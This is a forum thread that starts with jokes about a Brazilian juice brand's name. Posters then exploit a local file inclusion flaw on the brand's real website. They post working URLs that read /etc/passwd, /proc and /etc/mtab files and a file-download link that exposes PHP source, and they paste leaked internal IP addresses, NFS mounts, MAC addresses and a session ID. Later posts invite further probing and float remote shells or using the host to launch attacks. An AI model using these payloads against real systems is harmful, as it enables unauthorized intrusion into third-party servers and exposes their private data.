I saw this juice while shopping some time ago...

Guess what!

it doesn't sucks...

 

http://www.sukest.com.br/template.php?pagina=produtos.php&product=578&category=552&screen=0&search=

 

Funny.  Is the name possibly related to the fact that kids might drink the juice through a straw?  Or is it just a happy and amusing coincidence?

 

cconroy:

Funny.  Is the name possibly related to the fact that kids might drink the juice through a straw?  Or is it just a happy and amusing coincidence?

 

 

Probably a coincident. Its portuguese, but its a brand name so im not sure that it could mean similar to sucks in english

haha, the real wtf is there site. I found a way to download what seems like any file off their server

If you're ever in France, try this lemon soda.  It's really good, even if it does taste like ... lemon soda.

http://www.pschitt.fr/

 

This ad is for the Brazilian (and maybe Latin American) market.

In Portuguese, "suks" does not have any meaning, but it sounds like "suco" (juice).
 

newfweiler:

If you're ever in France, try this lemon soda.  It's really good, even if it does taste like ... lemon soda.

http://www.pschitt.fr/

 

 

Heh. I love the "Pschitt! Yourself" option on the main site. 

plazmo:

haha, the real wtf is there site. I found a way to download what seems like any file off their server

Ahh, that classics. Once I figured out that "pagina" doesn't mean what I thought it did, it was easy!

http://www.sukest.com.br/template.php?pagina=/etc/passwd&product=578&category=552&screen=0&search= 

Luckily, their webserver isn't running as r00t!  

Bets on whether this allows remote file inclusion? *doesn't want to try* 

http://www.sukest.com.br/template.php?pagina=/etc/slackware-version&category=552&screen=0&search=

Slackware 11. 2.6.7 kernel. 

kirchhoff:

http://www.sukest.com.br/template.php?pagina=/etc/slackware-version&category=552&screen=0&search=

Slackware 11. 2.6.7 kernel. 

try /proc. http://www.sukest.com.br/template.php?pagina=/proc/cpuinfo

      processor	: 0
vendor_id	: GenuineIntel
cpu family	: 15
model		: 6
model name	: Intel(R) Pentium(R) D CPU 2.80GHz
stepping	: 4
cpu MHz		: 2800.416
cache size	: 2048 KB
physical id	: 0
siblings	: 2
core id		: 0
cpu cores	: 2
fdiv_bug	: no
hlt_bug		: no
f00f_bug	: no
coma_bug	: no
fpu		: yes
fpu_exception	: yes
cpuid level	: 6
wp		: yes
flags		: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc pni monitor ds_cpl est cid cx16 xtpr lahf_lm
bogomips	: 5605.42

processor	: 1
vendor_id	: GenuineIntel
cpu family	: 15
model		: 6
model name	: Intel(R) Pentium(R) D CPU 2.80GHz
stepping	: 4
cpu MHz		: 2800.416
cache size	: 2048 KB
physical id	: 0
siblings	: 2
core id		: 1
cpu cores	: 2
fdiv_bug	: no
hlt_bug		: no
f00f_bug	: no
coma_bug	: no
fpu		: yes
fpu_exception	: yes
cpuid level	: 6
wp		: yes
flags		: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc pni monitor ds_cpl est cid cx16 xtpr lahf_lm
bogomips	: 5600.70

http://www.sukest.com.br/template.php?pagina=/etc/mtab

      /dev/sda2 / reiserfs rw 0 0
proc /proc proc rw 0 0
sysfs /sys sysfs rw 0 0
file:/home/apache /mnt/apache nfs rw,rsize=8192,wsize=8192,hard,intr,addr=10.174.141.105 0 0
file:/home/firstsite /mnt/firstsite nfs rw,addr=10.174.141.105 0 0
file:/home/sites /mnt/sites nfs rw,addr=10.174.141.105 0 0
file:/home/aceite /mnt/aceite nfs rw,rsize=8192,wsize=8192,hard,intr,addr=10.174.141.105 0 0
file:/home/tomcat4/webapps /opt/tomcat4/webapps nfs rw,addr=10.174.141.105 0 0
file:/home/web /mnt/web nfs rw,addr=10.174.141.105 0 0
file:/home/web/producao/java/tomcat5 /opt/tomcat5/webapps nfs rw,addr=10.174.141.105 0 0
file:/home/web/producao/java/tomcat3 /opt/tomcat3/webapps nfs rw,addr=10.174.141.105 0 0

http://www.sukest.com.br/template.php?pagina=/proc/uptime

8473928.52 6995444.24

http://www.sukest.com.br/template.php?pagina=/proc/net/arp

      IP address       HW type     Flags       HW address            Mask     Device
10.174.141.2     0x1         0x2         00:0E:0C:4E:27:E5     *        eth0
10.174.141.105   0x1         0x2         00:08:54:28:E5:2F     *        eth0
10.174.141.5     0x1         0x2         00:0E:0C:4E:27:E5     *        eth0
10.174.141.93    0x1         0x2         00:60:08:3A:11:EE     *        eth0
10.0.0.20        0x1         0x2         00:01:03:DD:1B:9F     *        eth0
10.174.141.110   0x1         0x2         00:50:04:81:5F:96     *        eth0
10.174.141.91    0x1         0x2         00:60:08:3A:11:EE     *        eth0

http://www.sukest.com.br/template.php?pagina=/proc/net/dev

 Inter-|   Receive                                                |  Transmit
 face |bytes    packets errs drop fifo frame compressed multicast|bytes    packets errs drop fifo colls carrier compressed
  eth0:871871887 680310827   15    0    0    15          0         0 2100491378 743447569    0    0    0     0       0          0
    lo:  628831    7990    0    0    0     0          0         0   628831    7990    0    0    0     0       0          0

If anyone is really adventurous, go try and open some logs or a httpd.conf somewhere.

 

http://www.sukest.com.br/neodownload/force_download.php?file=/mnt/apache/www.sukest.com.br/template.php&name=template.php

 

plazmo:

 

http://www.sukest.com.br/neodownload/force_download.php?file=/mnt/apache/www.sukest.com.br/template.php&name=template.php

 

That's definitely a WTF :o

purely out of interest, do you guys know what a honeypot system is? :)

KluZz:

purely out of interest, do you guys know what a honeypot system is? :)

Ooh, look. A shiny <font>. cute. :)

The script is clearly running on the web server.

You would face a honeypot trap when you try to sneak from a server to another. Eg. compromise the server and try to access another one on the network from it.

 

I could be wrong, but this one is certainly not a honeypot.

KluZz:

purely out of interest, do you guys know what a honeypot system is? :)

 

Its a server set up with an intentional flaw to trap attackers.

Ive seen a few in the past, but i dont think this is one. 

At least the webserver doesn't run as root ;)

fennec:

KluZz:

purely out of interest, do you guys know what a honeypot system is? :)

Ooh, look. A shiny <font>. cute. :)

There was that one person -- still may be around, actually -- that would embiggen and bold the first letter of all of his/her posts, in what I suppose was intended to be "ye olde manuscript" style.

kirchhoff:

http://www.sukest.com.br/template.php?pagina=/etc/slackware-version&category=552&screen=0&search=

Slackware 11. 2.6.7 kernel. 

http://www.sukest.com.br/template.php?pagina=/proc/version&category=552&screen=0&search=

Linux version 2.6.19.1-POWER_EDGE_840 (root@web1) (gcc version 3.4.6) #3 SMP Tue Jan 2 14:14:51 BRST 2007

Oddly, it won't let you view /dev/zero, /dev/random, or /dev/urandom.

Awesome. 

a href="template.php?pagina=arearestrita.htm&PHPSESSID=27f9ab0cde991c62f588ba7fce186b40

Session ID hardcoded into the php source? This is madness.

Kemp:

a href="template.php?pagina=arearestrita.htm&PHPSESSID=27f9ab0cde991c62f588ba7fce186b40

Session ID hardcoded into the php source? This is madness.

An artifact from slightly incorrect usage of session vars. 

Ok, this is even more messed up than I thought. The "pagina" variable in template.php (thanks for that link :P) is run straight through include(), which according to the php document site: http://www.php.net/manual/en/function.include.php will allow remote execution of php files. This seems to me that one could write a php file that prints out php text, put it somewhere public, and have this site read it in. You know have unfettered access to the system (probably quite easy to write a remote shell) and can I'm sure quite easily get root access.

I think someone needs to send an anonymous letter to this site warning them of the gaping security hole here...
 

The hosting provider is using privledge separation. The site is running as a virtual-host specific user without access to any really interesting files. You can certainly deface the site, but that's not very useful. It might be neat to launch attacks from it though, or configure it to run a Tor exit node.

JamesKilton:

Ok, this is even more messed up than I thought. The "pagina" variable in template.php (thanks for that link :P) is run straight through include(), which according to the php document site: http://www.php.net/manual/en/function.include.php will allow remote execution of php files.

Sure, it's used in an include() statement, but file_exists() is used to check if the file exists. Since this fails for remote files, no remote inclusion can be done.